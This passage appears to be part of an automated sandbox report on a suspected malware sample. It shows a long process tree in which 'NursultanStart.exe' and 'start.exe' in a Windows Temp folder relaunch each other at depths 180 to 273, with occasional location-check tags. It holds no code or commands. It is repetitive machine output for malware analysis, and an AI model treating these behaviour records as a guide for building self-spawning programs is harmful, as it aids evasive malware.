        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        180⤵
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        180⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        181⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        181⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        182⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        182⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        183⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        183⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        184⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        184⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        185⤵
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        185⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        186⤵
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        186⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        187⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        187⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        188⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        188⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        189⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        189⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        190⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        190⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        191⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        191⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        192⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        192⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        193⤵
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        193⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        194⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        194⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        195⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        195⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        196⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        196⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        197⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        197⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        198⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        198⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        199⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        199⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        200⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        200⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        201⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        201⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        202⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        202⤵
        Checks computer location settings
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        203⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        203⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        204⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        204⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        205⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        205⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        206⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        206⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        207⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        207⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        208⤵
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        208⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        209⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        209⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        210⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        210⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        211⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        211⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        212⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        212⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        213⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        213⤵
        
        PID:112
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        214⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        214⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        215⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        215⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        216⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        216⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        217⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        217⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        218⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        218⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        219⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        219⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        220⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        220⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        221⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        221⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        222⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        222⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        223⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        223⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        224⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        224⤵
        
        PID:3368
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        225⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        225⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        226⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        226⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        227⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        227⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        228⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        228⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        229⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        229⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        230⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        230⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        231⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        231⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        232⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        232⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        233⤵
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        233⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        234⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        234⤵
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        235⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        235⤵
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        236⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        236⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        237⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        237⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        238⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        238⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        239⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        239⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        240⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        240⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        241⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        241⤵
        Checks computer location settings
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        242⤵
        
        PID:460
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        242⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        243⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        243⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        244⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        244⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        245⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        245⤵
        Checks computer location settings
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        246⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        246⤵
        
        PID:368
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        247⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        247⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        248⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        248⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        249⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        249⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        250⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        250⤵
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        251⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        251⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        252⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        252⤵
        
        PID:1056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        253⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        253⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        254⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        254⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        255⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        255⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        256⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        256⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        257⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        257⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        258⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        258⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        259⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        259⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        260⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        260⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        261⤵
        
        PID:3080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        261⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        262⤵
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        262⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        263⤵
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        263⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        264⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        264⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        265⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        265⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        266⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        266⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        267⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        267⤵
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        268⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        268⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        269⤵
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        269⤵
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        270⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        270⤵
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        271⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        271⤵
        Checks computer location settings
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        272⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        272⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        273⤵
        
        PID:3404
        
